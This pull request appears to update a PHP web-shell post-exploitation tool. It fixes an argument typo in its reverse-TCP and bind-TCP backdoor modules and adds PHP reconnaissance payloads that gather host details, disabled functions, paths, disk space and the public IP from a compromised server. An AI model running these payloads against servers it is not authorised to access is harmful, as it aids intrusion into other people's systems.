### PR TITLE
Fix a few things & add info to :system_info

### DIFF
--- a/modules/backdoor/reversetcp.py
+++ b/modules/backdoor/reversetcp.py
@@ -77,7 +77,7 @@ class Reversetcp(Module):
           { 'name' : 'lhost', 'help' : 'Local host' },
           { 'name' : 'port', 'help' : 'Port to spawn', 'type' : int },
           { 'name' : '-shell', 'help' : 'Specify shell', 'default' : '/bin/sh' },
-          { 'name' : '-no-autonnect', 'help' : 'Skip autoconnect', 'action' : 'store_true', 'default' : False },
+          { 'name' : '-no-autoconnect', 'help' : 'Skip autoconnect', 'action' : 'store_true', 'default' : False },
           { 'name' : '-vector', 'choices' : self.vectors.get_names() }
         ])
 

--- a/modules/backdoor/tcp.py
+++ b/modules/backdoor/tcp.py
@@ -53,7 +53,7 @@ class Tcp(Module):
         self.register_arguments([
           { 'name' : 'port', 'help' : 'Port to spawn', 'type' : int },
           { 'name' : '-shell', 'help' : 'Specify shell', 'default' : '/bin/sh' },
-          { 'name' : '-no-autonnect', 'help' : 'Skip autoconnect', 'action' : 'store_true', 'default' : False },
+          { 'name' : '-no-autoconnect', 'help' : 'Skip autoconnect', 'action' : 'store_true', 'default' : False },
           { 'name' : '-vector', 'choices' : self.vectors.get_names() }
         ])
 

--- a/modules/file/check.py
+++ b/modules/file/check.py
@@ -1,16 +1,13 @@
 from core.vectors import PhpCode
 from core.module import Module
-from core import messages
-import random
 import datetime
+import utils
 
 
 class Check(Module):
-
     """Get attributes and permissions of a file."""
 
     def init(self):
-
         self.register_info(
             {
                 'author': [
@@ -21,67 +18,44 @@ class Check(Module):
         )
 
         # Declared here since is used by multiple vectors
-        payload_perms = """$f='${rpath}';if(@file_exists($f)){print('e');if(@is_readable($f))print('r');if(@is_writable($f))print('w');if(@is_executable($f))print('x');}"""
+        payload_perms = (
+            "$f='${rpath}';if(@file_exists($f)){print('e');if(@is_readable($f))print('r');" +
+            "if(@is_writable($f))print('w');if(@is_executable($f))print('x');}"
+        )
 
         self.register_vectors(
             [
-            PhpCode(
-              payload_perms,
-              name = 'exists',
-              postprocess = lambda x: True if 'e' in x else False
-            ),
-            PhpCode("print(md5_file('${rpath}'));",
-              name = "md5"
-            ),
-            PhpCode( payload_perms,
-              name = "perms",
-            ),
-            PhpCode( payload_perms,
-              name = "readable",
-              postprocess = lambda x: True if 'r' in x else False
-            ),
-            PhpCode( payload_perms,
-              name = "writable",
-              postprocess = lambda x: True if 'w' in x else False
-            ),
-            PhpCode( payload_perms,
-              name = "executable",
-              postprocess = lambda x: True if 'x' in x else False
-            ),
-            PhpCode("(is_file('${rpath}') && print(1)) || print(0);",
-              name = "file",
-              postprocess = lambda x: True if x == '1' else False
-            ),
-            PhpCode("(is_dir('${rpath}') && print(1)) || print(0);",
-              name = "dir",
-              postprocess = lambda x: True if x == '1' else False
-            ),
-            PhpCode("print(filesize('${rpath}'));",
-              name = "size",
-              postprocess = lambda x: int(x)
-            ),
-            PhpCode("print(filemtime('${rpath}'));",
-              name = "time",
-              postprocess = lambda x: int(x)
-            ),
-            PhpCode("print(filemtime('${rpath}'));",
-              name = "datetime",
-              postprocess = lambda x: datetime.datetime.fromtimestamp(float(x)).strftime('%Y-%m-%d %H:%M:%S')
-            ),
-            PhpCode("print(realpath('${rpath}'));",
-              name = "abspath"
-            )
+                PhpCode(payload_perms, 'exists',
+                        postprocess=lambda x: True if 'e' in x else False),
+                PhpCode("print(md5_file('${rpath}'));", 'md5'),
+                PhpCode(payload_perms, 'perms'),
+                PhpCode(payload_perms, 'readable',
+                        postprocess=lambda x: True if 'r' in x else False),
+                PhpCode(payload_perms, 'writable',
+                        postprocess=lambda x: True if 'w' in x else False),
+                PhpCode(payload_perms, 'executable',
+                        postprocess=lambda x: True if 'x' in x else False),
+                PhpCode("print(is_file('${rpath}') ? 1 : 0);", 'file',
+                        postprocess=lambda x: True if x == '1' else False),
+                PhpCode("print(is_dir('${rpath}') ? 1 : 0);", 'dir',
+                        postprocess=lambda x: True if x == '1' else False),
+                PhpCode("print(filesize('${rpath}'));", 'size',
+                        postprocess=lambda x: utils.prettify.format_size(int(x))),
+                PhpCode("print(filemtime('${rpath}'));", 'time',
+                        postprocess=lambda x: int(x)),
+                PhpCode("print(filemtime('${rpath}'));", 'datetime',
+                        postprocess=lambda x: datetime.datetime.fromtimestamp(float(x)).strftime('%Y-%m-%d %H:%M:%S')),
+                PhpCode("print(realpath('${rpath}'));", 'abspath')
             ]
         )
 
         self.register_arguments([
-          { 'name' : 'rpath', 'help' : 'Target path' },
-          { 'name' : 'check', 'choices' : self.vectors.get_names() },
+            {'name': 'rpath', 'help': 'Target path'},
+            {'name': 'check', 'choices': self.vectors.get_names()},
         ])
 
     def run(self):
-
         return self.vectors.get_result(
-         name = self.args['check'],
-         format_args = self.args
+            name=self.args['check'],
+            format_args=self.args
         )

--- a/modules/system/info.py
+++ b/modules/system/info.py
@@ -3,7 +3,7 @@ from core.module import Module
 from core import messages
 from core.loggers import log
 from core import modules
-import random
+import utils
 
 
 class Info(Module):
@@ -15,6 +15,17 @@ class Info(Module):
         'hostname',
         'pwd',
         'uname'
+    ]
+
+    default_provider = 'http://ifconfig.me/'
+
+    extended_vectors = [
+        'server_soft',
+        'server_ip',
+        'ini_path',
+        'tmp_path',
+        'free_space',
+        'dir_sep'
     ]
 
     def init(self):
@@ -30,65 +41,91 @@ class Info(Module):
 
         self.register_vectors(
             [
-            PhpCode("print(@$_SERVER['DOCUMENT_ROOT']);", 'document_root'),
-            PhpCode("""
-                if(is_callable('posix_getpwuid')&&is_callable('posix_geteuid')) {
-                    $u=@posix_getpwuid(@posix_geteuid());
-                    if($u){
-                        $u=$u['name'];
-                    } else {
-                        $u=getenv('username');
+                PhpCode("print(@$_SERVER['DOCUMENT_ROOT']);", 'document_root'),
+                PhpCode("@print(getcwd());", 'pwd'),
+                PhpCode("print(dirname(__FILE__));", 'script_folder'),
+                PhpCode("print(@$_SERVER['SCRIPT_NAME']);", 'script'),
+                PhpCode("print(@$_SERVER['PHP_SELF']);", 'php_self'),
+                PhpCode("""
+                    if(is_callable('posix_getpwuid')&&is_callable('posix_geteuid')) {
+                        $u=@posix_getpwuid(@posix_geteuid());
+                        if($u){
+                            $u=$u['name'];
+                        } else {
+                            $u=getenv('username');
+                        }
+                        print($u);
                     }
-                    print($u);
-                }
-            """, 'whoami'),
-            PhpCode("print(@gethostname());", 'hostname'),
-            PhpCode("@print(getcwd());", 'pwd'),
-            PhpCode("$v=@ini_get('open_basedir'); if($v) print($v);", 'open_basedir'),
-            PhpCode("(@ini_get('safe_mode') && print(1)) || print(0);", 'safe_mode',
-             postprocess = lambda x: True if x=='1' else False
-            ),
-            PhpCode("print(@$_SERVER['SCRIPT_NAME']);", 'script'),
-            PhpCode("print(dirname(__FILE__));", 'script_folder'),
-            PhpCode("print(@php_uname());", 'uname'),
-            PhpCode("print(@php_uname('s'));", 'os'),
-            PhpCode("print(@$_SERVER['REMOTE_ADDR']);", 'client_ip'),
-            PhpCode('print(@ini_get("max_execution_time"));', 'max_execution_time',
-             postprocess = lambda x: int(x) if x and x.isdigit() else False
-            ),
-            PhpCode('print(@$_SERVER["PHP_SELF"]);', 'php_self'),
-            PhpCode('@print(DIRECTORY_SEPARATOR);', 'dir_sep'),
-            PhpCode("""
-                $v='';
-                if(function_exists('phpversion')) {
-                    $v=phpversion();
-                } elseif(defined('PHP_VERSION')) {
-                    $v=PHP_VERSION;
-                } elseif(defined('PHP_VERSION_ID')) {
-                    $v=PHP_VERSION_ID;
-                }
-                print($v);""", 'php_version')
+                """, 'whoami'),
+                PhpCode("print(@gethostname());", 'hostname'),
+                PhpCode("$v=@ini_get('open_basedir'); if($v) print($v);", 'open_basedir'),
+                PhpCode("print(@ini_get('disable_functions'));", 'disable_functions'),
+                PhpCode("print(@php_ini_loaded_file());", 'ini_path'),
+                PhpCode("print(@sys_get_temp_dir());", 'tmp_path'),
+                PhpCode("print(@disk_free_space(__DIR__));", 'free_space',
+                        postprocess=lambda x: utils.prettify.format_size(int(x))),
+                PhpCode("print(@ini_get('safe_mode') ? 1 : 0);", 'safe_mode',
+                        postprocess=lambda x: True if x == '1' else False),
+                PhpCode("print(@$_SERVER['SERVER_SOFTWARE']);", 'server_soft'),
+                PhpCode("print(@php_uname());", 'uname'),
+                PhpCode("print(@php_uname('s') . ' ' . @php_uname('m'));", 'os'),
+                PhpCode("print(@$_SERVER['REMOTE_ADDR']);", 'client_ip'),
+                PhpCode("print(@file_get_contents('${provider}'));", 'server_ip'),
+                PhpCode("print(@$_SERVER['SERVER_NAME']);", 'server_name'),
+                PhpCode("print(@ini_get('max_execution_time'));", 'max_execution_time',
+                        postprocess=lambda x: int(x) if x and x.isdigit() else False),
+                PhpCode("@print(DIRECTORY_SEPARATOR);", 'dir_sep'),
+                PhpCode("""
+                    $v='';
+                    if(function_exists('phpversion')) {
+                        $v=phpversion();
+                    } elseif(defined('PHP_VERSION')) {
+                        $v=PHP_VERSION;
+                    } elseif(defined('PHP_VERSION_ID')) {
+                        $v=PHP_VERSION_ID;
+                    }
+                    print($v);
+                """, 'php_version')
             ]
         )
 
         self.register_arguments([
-          { 'name' : '-info',
-            'help' : 'Select information',
-            'choices' : self.vectors.get_names(),
-            'nargs' : '+' }
+            {'name': '-info',
+             'help': 'Select information (possible values are: %s)' % (', '.join(self.vectors.get_names())),
+             'choices': self.vectors.get_names(),
+             'default': [],
+             'nargs': '+',
+             'metavar': 'arg'},
+            {'name': '-extended',
+             'help': 'Get more info. Slower. (extended info: %s)' % (', '.join(self.extended_vectors)),
+             'action': 'store_true',
+             'default': False},
+            {'name': '-provider',
+             'help': 'The URL to get server_ip from (default: %s)' % self.default_provider,
+             'metavar': 'http://...',
+             'default': self.default_provider}
         ])
 
     def run(self):
 
+        vectors = self.args.get('info')
+
+        if not vectors and not self.args.get('extended'):
+            vectors = [i for i in self.vectors.get_names() if i not in self.extended_vectors]
+
         result = self.vectors.get_results(
-            names = self.args.get('info', []),
-            results_to_store = (
-                            'whoami',
-                            'hostname',
-                            'dir_sep',
-                            'os',
-                            'script_folder'
-            )
+            names=vectors,
+            results_to_store=(
+                'whoami',
+                'hostname',
+                'dir_sep',
+                'os',
+                'script_folder',
+                'server_ip'
+            ),
+            format_args={
+                'provider': self.args.get('provider')
+            }
         )
 
         # Returns a string when a single information is requested,
@@ -98,7 +135,6 @@ class Info(Module):
             return result[info[0]]
         else:
             return result
-
 
     def run_alias(self, args, cmd):
 

--- a/utils/prettify.py
+++ b/utils/prettify.py
@@ -9,7 +9,7 @@ def tablify(data, table_border = True, header=False):
     output = ''
 
     # Empty outputs. False is probably a good output value
-    if data != False and not data:
+    if data is not False and not data:
         output = ''
     else:
 
@@ -31,7 +31,7 @@ def tablify(data, table_border = True, header=False):
                 for row in data:
                     if not row:
                         continue
-                        
+
                     if isinstance(row, (list, tuple)):
                         table.add_row(row)
                     else:
@@ -96,3 +96,11 @@ def shorten(body, keep_header = 0, keep_trailer = 0):
             return '%s .. %s' % (body[:keep_header], body[-keep_trailer:])
 
     return body
+
+
+def format_size(size, suffix='o'):
+    for unit in ['', 'K', 'M', 'G', 'T', 'P', 'E', 'Z']:
+        if abs(size) < 1000.0:
+            return "%.3G%s%s" % (size, unit, suffix)
+        size /= 1000.0
+    return "%.3G%s%s" % (size, 'Y', suffix)


### PR DESCRIPTION
### Fixes
#### :audit_phpconf
- `open_basedir` separator was wrong
- returned result for `open_basedir` was broken
- results table contained quirks (a half-empty line for each category, there's now one empty line in between each category)

#### :backdoor_*
- `-no-autonnect` > `-no-autoconnect`

### Additions
#### :file_check
- `size` is now formatted

#### :system_info
- added `-extended` option, to show "more" info (`server_soft`, `server_ip`, `ini_path`, `tmp_path`, `free_space`, `dir_sep`)
- added `disable_functions` info (not extended)
- added `server_ip` info, which is the public IP of the target server, retrieved with an HTTP request to a provider
- added `-provider` option, to set a provider manually (`http://ifconfig.me/` by default)
- added `server_soft` info, which retrieves `$_SERVER['SERVER_SOFTWARE']`
- added `ini_path` info, which is the path to the INI configuration file currently used by PHP
- added `tmp_path` info, which is the path to the temporary directory used by PHP
- added `free_space` info, which is the current disk (current directory) free space
- `dir_sep` is now displayed only if `-extended` is active